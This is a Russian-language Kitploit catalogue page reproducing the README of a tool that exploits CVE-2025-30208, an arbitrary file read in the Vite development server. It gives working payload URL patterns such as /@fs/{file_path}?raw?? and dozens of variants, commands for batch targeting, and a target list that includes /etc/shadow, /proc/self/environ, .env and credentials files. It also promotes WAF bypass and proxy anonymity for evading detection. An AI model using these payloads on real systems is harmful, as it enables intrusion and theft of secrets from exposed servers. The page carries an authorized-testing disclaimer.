Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 — это уязвимость произвольного чтения файлов средней степени опасности в сервере разработки Vite (популярный инструмент сборки фронтенда). | Kitploit
Инструменты/GitHubGitHub/themehackers/cve-2025-30208
Сканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 — это уязвимость произвольного чтения файлов средней степени опасности в сервере разработки Vite (популярный инструмент сборки фронтенда).

Репозиторий
101 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🔥 CVE-2025-30208 Vite — Сканер уязвимости произвольного чтения файлов

Python License Security Status Modular

Продвинутый сканер уязвимости CVE-2025-30208 с функциями корпоративного уровня

Профессиональный инструмент для тестирования на проникновение для обнаружения уязвимости произвольного чтения файлов Vite

🚀 Быстрый старт • 📋 Особенности • 🔧 Использование • 📊 Примеры • 🛡️ Безопасность


📖 Обзор

Это комплексный сканер уязвимостей, предназначенный для обнаружения и эксплуатации уязвимости CVE-2025-30208 на серверах разработки Vite. Уязвимость позволяет произвольное чтение файлов через конечные точки файловой системы Vite, потенциально раскрывая конфиденциальные файлы конфигурации, исходный код и системную информацию.

🎯 Что делает этот инструмент

  • Обнаруживает уязвимые экземпляры Vite в сети
  • Эксплуатирует уязвимость произвольного чтения файлов безопасно
  • Находит конфиденциальные файлы и данные конфигурации
  • Сообщает результаты в нескольких форматах (HTML, JSON, консоль)
  • Управляет сеансами сканирования и конфигурациями
  • Обрабатывает ошибки корректно с механизмами автоматического повтора

🏗️ Модульная архитектура

Инструмент теперь имеет модульную архитектуру для лучшей поддерживаемости и расширяемости:

  • CVE-2025-30208.py — Основное приложение сканера
  • payloads.py — Продвинутые полезные нагрузки для эксплуатации (60+ вариаций)
  • sensitive_files.py — Комплексная база конфиденциальных файлов (200+ файлов)
  • html_template.py — Улучшенный шаблон HTML-отчёта в стиле хакера

🚀 Быстрый старт

Предварительные требования

root@kitploit:~
pip3 install -r requirements.txt

Базовое использование

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Особенности

🔍 Основное обнаружение уязвимостей

  • 60+ продвинутых полезных нагрузок: Комплексные методы эксплуатации для максимального обнаружения
  • Умное обнаружение: Интеллектуальный анализ ответов для избежания ложных срабатываний
  • Валидация в реальном времени: Непрерывная проверка ответов цели
  • Комплексное тестирование: Проверка всех известных уязвимых конечных точек

🛡️ Расширенные функции безопасности

  • Поддержка прокси: Настройка HTTP/HTTPS прокси для анонимности
  • Пользовательские заголовки: Обход WAF/IPS с помощью пользовательских HTTP-заголовков
  • Ограничение скорости: Настраиваемые задержки для избежания обнаружения
  • Управление сеансами: Сохранение и восстановление сеансов сканирования
  • Валидация ввода: Комплексная проверка параметров

🔧 Продвинутые возможности

  • Пакетное сканирование: Многопоточное сканирование нескольких целей
  • Обнаружение конфиденциальных файлов: Автоматическое обнаружение более 200 конфиденциальных файлов
  • Тестирование подключения: Тестирование протоколов TCP/UDP/HTTP/HTTPS
  • Восстановление после ошибок: Автоматический повтор с экспоненциальной задержкой
  • Комплексное логирование: Детальные журналы с временными метками

📊 Отчёты и вывод

  • 🎨 Улучшенные HTML-отчёты: Красивые отчёты об уязвимостях в стиле хакера с анимацией
  • Экспорт в JSON: Структурированные данные для дальнейшего анализа
  • Вывод в консоль: Цветная обратная связь в реальном времени
  • Файлы журналов: Детальные аудиторские следы
  • Интерактивный веб-интерфейс: Встроенный веб-сервер для просмотра отчётов

🔧 Руководство по использованию

1. Базовая конфигурация

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Тестирование уязвимости

root@kitploit:~
CVE-2025-30208 > run

# Включить подробный режим для детального вывода
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Пакетное сканирование

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Нажмите Enter дважды для завершения]

4. Обнаружение конфиденциальных файлов

root@kitploit:~
CVE-2025-30208 > scan

5. Продвинутая конфигурация

root@kitploit:~
# Настройка прокси
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Установка пользовательских заголовков
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Настройка ограничения скорости
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Улучшенное HTML-отчётность

root@kitploit:~
# Создать красивый HTML-отчёт
CVE-2025-30208 > pull

# Запустить веб-сервер для просмотра отчёта
CVE-2025-30208 > web

# Запустить веб-сервер на определённом порту
CVE-2025-30208 > web 8081

# Остановить веб-сервер
CVE-2025-30208 > web off

📊 Справочник команд


⚙️ Параметры конфигурации


🎨 Улучшенная система полезных нагрузок

Теперь сканер использует более 60 различных вариаций полезных нагрузок, организованных в payloads.py:

Основные полезные нагрузки @fs

root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Расширенные вариации параметров

root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Специфические для Vite вариации

root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

Вариации модульной системы

root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

Альтернативные конечные точки

root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 Улучшенное обнаружение конфиденциальных файлов

Инструмент теперь проверяет более 200 конфиденциальных файлов, организованных в sensitive_files.py:

🖥️ Системные файлы (Linux/Unix)

  • /etc/passwd — Информация об учётных записях пользователей
  • /etc/shadow — Зашифрованные данные паролей
  • /etc/services — Сетевые службы
  • /etc/hosts — Сопоставления имён хостов
  • /etc/fstab — Таблица файловой системы
  • /etc/ssh/sshd_config — Конфигурация SSH-сервера
  • /etc/crontab — Системные задачи cron
  • /etc/sudoers — Конфигурация sudo

📊 Информация о процессах

  • /proc/version — Версия ядра
  • /proc/cpuinfo — Информация о CPU
  • /proc/meminfo — Информация о памяти
  • /proc/self/environ — Окружение процесса
  • /proc/self/cmdline — Командная строка процесса
  • /proc/net/tcp — TCP-соединения
  • /proc/net/udp — UDP-соединения

⚙️ Конфигурация приложения

  • .env — Переменные окружения
  • .env.local — Локальное окружение
  • .env.production — Продуктовое окружение
  • config.json — Конфигурация приложения
  • settings.json — Настройки приложения
  • application.properties — Конфигурация Spring
  • application.yml — YAML-конфигурация
  • database.yml — Конфигурация базы данных
  • secrets.json — Управление секретами

📦 Файлы Node.js / JavaScript

  • package.json — Зависимости Node.js
  • package-lock.json — Заблокированные зависимости
  • yarn.lock — Файл блокировки Yarn
  • vite.config.js — Конфигурация Vite
  • vite.config.ts — TypeScript конфигурация Vite
  • tsconfig.json — Конфигурация TypeScript
  • webpack.config.js — Конфигурация Webpack
  • next.config.js — Конфигурация Next.js
  • nuxt.config.js — Конфигурация Nuxt.js
  • angular.json — Конфигурация Angular
  • vue.config.js — Конфигурация Vue.js
  • rollup.config.js — Конфигурация Rollup
  • eslint.config.js — Конфигурация ESLint

🔧 Git-файлы

  • .git/config — Конфигурация Git
  • .gitignore — Правила игнорирования Git
  • .gitattributes — Атрибуты Git
  • .gitmodules — Подмодули Git
  • .git/HEAD — Текущая ветка
  • .git/logs/HEAD — Журналы Git
  • .git/refs/heads/master — Ветка master
  • .git/refs/heads/main — Ветка main

📚 Файлы документации

  • README.md — Документация проекта
  • CHANGELOG.md — Журнал изменений
  • LICENSE — Информация о лицензии
  • CONTRIBUTING.md — Рекомендации по участию
  • AUTHORS — Информация об авторах
  • TODO.md — Список задач
  • ROADMAP.md — План развития

🐳 Docker-файлы

  • Dockerfile — Конфигурация Docker
  • docker-compose.yml — Docker Compose
  • docker-compose.override.yml — Конфигурация переопределения
  • .dockerignore — Правила игнорирования Docker
  • docker-compose.prod.yml — Продуктовая конфигурация
  • docker-compose.dev.yml — Конфигурация разработки

🌐 Конфигурация веб-сервера

  • nginx.conf — Конфигурация Nginx
  • apache2.conf — Конфигурация Apache
  • httpd.conf — Конфигурация HTTP-демона
  • .htaccess — Управление доступом Apache
  • web.config — Конфигурация IIS
  • robots.txt — Директивы для поисковых систем
  • sitemap.xml — Структура сайта
  • manifest.json — Манифест веб-приложения
  • sw.js — Service Worker
  • firebase.json — Конфигурация Firebase
  • firebase.rules — Правила безопасности Firebase

🪟 Файлы Windows

  • boot.ini — Конфигурация загрузки
  • autoexec.bat — Скрипт автозапуска
  • system.ini — Системная конфигурация
  • win.ini — Конфигурация Windows
  • Users — Каталоги пользователей
  • Windows — Системные файлы
  • Program Files — Каталоги приложений

🍎 Файлы macOS

  • System — Системные файлы
  • Library — Библиотечные файлы
  • Applications — Файлы приложений
  • private/etc/hosts — Файл hosts
  • private/etc/passwd — Учётные записи пользователей

🗄️ Файлы баз данных

  • database.db — База данных SQLite
  • database.sqlite — База данных SQLite
  • data.db — База данных данных
  • dump.sql — Дамп базы данных
  • schema.sql — Схема базы данных
  • migrations — Миграции базы данных

📝 Файлы журналов

  • logs — Директория журналов
  • error.log — Журналы ошибок
  • access.log — Журналы доступа
  • app.log — Журналы приложения
  • debug.log — Отладочные журналы
  • combined.log — Комбинированные журналы

💾 Файлы резервных копий

  • backup — Директория резервных копий
  • backup.sql — Резервная копия базы данных
  • backup.zip — Сжатая резервная копия
  • dump — Дамп данных
  • export — Экспорт данных

🔒 Безопасность и аутентификация

  • auth.json — Конфигурация аутентификации
  • credentials.json — Хранилище учётных данных
  • keys.json — Управление ключами
  • tokens.json — Хранилище токенов
  • jwt.json — Конфигурация JWT
  • oauth.json — Конфигурация OAuth

🔌 Файлы API и служб

  • api.json — Конфигурация API
  • swagger.json — Документация API
  • openapi.json — Спецификация OpenAPI
  • graphql.json — Конфигурация GraphQL
  • schema.json — Схема API

☁️ Облачные файлы и развёртывание

  • cloudformation.yml — AWS CloudFormation
  • serverless.yml — Конфигурация Serverless
  • terraform.tf — Конфигурация Terraform
  • kubernetes.yml — Конфигурация Kubernetes
  • k8s.yml — Конфигурация Kubernetes

📊 Мониторинг и аналитика

  • analytics.json — Конфигурация аналитики
  • monitoring.json — Настройка мониторинга
  • metrics.json — Конфигурация метрик
  • telemetry.json — Данные телеметрии

🎨 Улучшенное HTML-отчётность

Инструмент теперь генерирует красивые HTML-отчёты в стиле хакера с:

✨ Визуальные функции

  • Фон в стиле «Матрицы» с анимированными падающими символами
  • Градиентные анимации и светящиеся эффекты
  • Интерактивные элементы с эффектами наведения
  • Адаптивный дизайн для всех устройств
  • Тёмная тема, оптимизированная для специалистов по безопасности

📊 Интерактивная статистика

  • Счётчики в реальном времени для общего количества утечек и байтов
  • Индикаторы серьёзности с цветовой кодировкой
  • Функция копирования для каждой утечки
  • Предварительный просмотр содержимого с размером и количеством строк
  • Разворачиваемые разделы для детального анализа

🔧 Технические особенности

  • Интеграция Google Fonts (JetBrains Mono, Orbitron)
  • CSS-анимации и переходы
  • Интерактивность JavaScript для улучшенного пользовательского опыта
  • Мобильно-адаптивный дизайн
  • Кросс-браузерная совместимость

🌐 Интеграция веб-сервера

  • Встроенный HTTP-сервер для просмотра отчётов
  • Автоматическое открытие браузера
  • Настройка порта
  • Команды быстрого запуска/остановки

🛡️ Обработка ошибок и восстановление

Механизм автоматического повтора

  • 3 попытки повтора: Неудачные запросы автоматически повторяются
  • Экспоненциальная задержка: Увеличение задержек между повторами
  • Умная классификация ошибок: Различная обработка для разных типов ошибок
  • Корректное восстановление: Инструмент продолжает работу после ошибок

Категории ошибок

  • NetworkError: Проблемы с подключением, тайм-аутом, прокси
  • ConfigurationError: Некорректные настройки и параметры
  • ValidationError: Некорректные входные параметры
  • ScannerError: Общие ошибки сканера

Функции валидации

  • Валидация ввода в реальном времени: Все параметры проверяются перед использованием
  • Валидация конфигурации: Полная проверка перед сканированием
  • Тестирование подключения: Тестирование протоколов TCP/UDP/HTTP/HTTPS
  • Валидация прокси: Проверка формата URL прокси

📁 Выходные файлы


📝 Затронутые версии

🚨 Уязвимые версии

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ Незатронутые версии

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ Безопасность и этическое использование

⚠️ Важные замечания по безопасности

  • Только авторизованное тестирование: Используйте только на системах, которые вам принадлежат или на которые у вас есть явное разрешение
  • Ответственное раскрытие: Сообщайте об уязвимостях владельцам систем
  • Ограничение скорости: Используйте соответствующие задержки, чтобы не перегружать цели
  • Использование прокси: Рассмотрите возможность использования прокси для анонимности, когда это уместно
  • Соответствие законодательству: Обеспечьте соблюдение местных законов и нормативных актов

🔒 Лучшие практики

  • Всегда получайте письменное разрешение перед тестированием
  • Используйте только в контролируемых средах
  • Документируйте все действия по тестированию
  • Соблюдайте ограничения скорости и системные ресурсы
  • Сообщайте о результатах ответственно

🚀 Продвинутые примеры использования

Пример 1: Комплексное сетевое сканирование

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

Пример 2: Скрытое сканирование с прокси

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

Пример 3: Улучшенный рабочий процесс отчётности

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

Пример 4: Обнаружение конфиденциальных файлов

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ Структура проекта

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # Основное приложение сканера
├── payloads.py                # Продвинутые полезные нагрузки для эксплуатации (60+)
├── sensitive_files.py         # База конфиденциальных файлов (200+)
├── html_template.py           # Улучшенный шаблон HTML-отчёта
├── README.md                  # Эта документация
├── requirements.txt           # Зависимости Python
├── logs/                      # Директория файлов журналов
├── data_leak.html            # Сгенерированные HTML-отчёты
├── data_leak.json            # Сгенерированные JSON-отчёты
└── session.json              # Сохранённые конфигурации сеансов

🤝 Участие

Мы приветствуем вклад в улучшение этого инструмента:

  1. Сделайте форк репозитория
  2. Создайте ветку для новой функции
  3. Внесите свои изменения
  4. Тщательно протестируйте
  5. Отправьте pull request

Области для участия

  • Новые вариации полезных нагрузок в payloads.py
  • Дополнительные шаблоны конфиденциальных файлов в sensitive_files.py
  • Улучшенные HTML-шаблоны в html_template.py
  • Улучшенная обработка ошибок
  • Оптимизация производительности
  • Улучшение документации

📄 Лицензия

Этот проект лицензирован только для образовательных целей и авторизованного тестирования безопасности.

⚠️ Юридическое предупреждение: Этот инструмент предназначен только для авторизованного тестирования безопасности и исследовательских целей. Пользователи несут ответственность за обеспечение надлежащего разрешения перед тестированием любых систем. Авторы не несут ответственности за любое неправомерное использование этого инструмента.


👨‍💻 Автор

ThemeHackers

GitHub

Исследователь безопасности и тестировщик на проникновение


⭐ Если этот инструмент помог вам, пожалуйста, поставьте ему звезду! ⭐

Сделано с ❤️ для сообщества безопасности

Скачать инструмент
КомандаОписаниеПример
set <опция> <значение>Установить параметры конфигурацииset RHOST 192.168.1.100
show optionsПоказать текущие настройкиshow options
editИнтерактивный редактор опцийedit
run / exploitЗапустить тест на уязвимостьrun
batchПакетное сканирование нескольких целейbatch
scanОбнаружить конфиденциальные файлыscan
pullЭкспортировать результаты в HTML/JSONpull
web [on|off|port]Веб-сервер для HTML-отчётовweb 8080
saveСохранить конфигурацию сеансаsave
loadЗагрузить конфигурацию сеансаload
testПроверить подключение к целиtest
validateПроверить текущую конфигурациюvalidate
verboseПереключить подробный режимverbose
proxyНастроить параметры проксиproxy
headersУстановить пользовательские HTTP-заголовкиheaders
rateНастроить ограничение скоростиrate
logПоказать информацию журналаlog
help / ?Показать справкуhelp
exit / quitВыйти из инструментаexit
ОпцияОписаниеПо умолчаниюВалидация
RHOSTЦелевой хост/IP-адрес-Валидация имени хоста/IP
RPORTНомер порта цели-Диапазон портов (1-65535)
FILEPATHПуть к файлу для тестированияetc/passwdВалидация пути
PROXYURL HTTP/HTTPS прокси-Валидация формата URL
VERBOSEВключить подробный выводfalseЛогическая валидация
RATE_LIMITЗадержка между запросами (секунды)0.3Числовая валидация
THREADSКоличество потоков для пакетного сканирования5Целочисленная валидация
TIMEOUTТайм-аут запроса (секунды)5Целочисленная валидация
CUSTOM_HEADERSПользовательские HTTP-заголовки (JSON){}Валидация формата JSON
  • prettier.config.js — Конфигурация Prettier
  • jest.config.js — Конфигурация Jest
  • babel.config.js — Конфигурация Babel
  • tailwind.config.js — Конфигурация Tailwind CSS
  • ФайлОписаниеФормат
    data_leak.htmlУлучшенный HTML-отчёт об уязвимости в стиле хакераHTML
    data_leak.jsonСтруктурированный экспорт в JSONJSON
    sensitive_files_discovery.jsonОбнаруженные конфиденциальные файлыJSON
    session.jsonСохранённая конфигурация сеансаJSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.logДетальные аудиторские журналыТекст